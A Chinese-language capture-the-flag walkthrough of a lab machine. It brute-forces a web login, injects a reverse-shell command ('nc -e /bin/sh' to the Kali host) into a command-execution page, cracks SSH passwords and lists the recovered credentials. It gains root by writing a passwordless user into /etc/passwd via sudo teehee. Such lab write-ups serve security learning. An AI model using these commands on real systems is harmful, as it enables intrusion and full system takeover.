第一步确定靶机和kali在同一网络模式下
确定自己的ip地址:192.168.91.129
nmap 尝试扫描靶机的ip:192.168.91.1228
拿到靶机ip第一步就是去浏览器访问80端口的http服务
是一个登录页面
开启bp,输入常用用户admin和超强弱密码123456.抓个包看看
直接丢到intruder去
给和密码加上&准备爆破
开始爆破
爆破到密码为happy
用admin:hayyp登录页面
成功进入,点击command继续深入
点击command,可以看到可以选择任意一个命令执行
抓个包看看
那是不是可以将ls -l换成一个反弹shell呢,先在kali开启监听
将ls+-l改成nc -e /bin/sh 192.168.91.129 8888,点击forward放行。
反弹成功
进来后先交互一下
在家目录下发现三个用户
在jim里有三个文件
找到了一个存放密码的文件
将所有密码拷贝,粘贴到kali的root目录下
对jim用户进行密码爆破,字典就用刚才找到的1.txt
成功爆破到密码
ssh远程登录
jim:jibril04
登录成功,但是登录的时候它多出来一句话,可以翻译下看看
进过查找, 在var目录发现mail,打开jim的邮件看看
又找到了一个用户和密码
Charles:^xHhA&hvim0y
既然找到了,那就进去看看
成功进入,但是进的时候要注意把用户大写的C换成小写
find / -perm -4000 -print 2>/dev/null 查看提权方式
可以用sudo提权
利用teehee的root权限在passwd中写入一个免密的root权限用户
echo "love::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
成功进入
寻找flag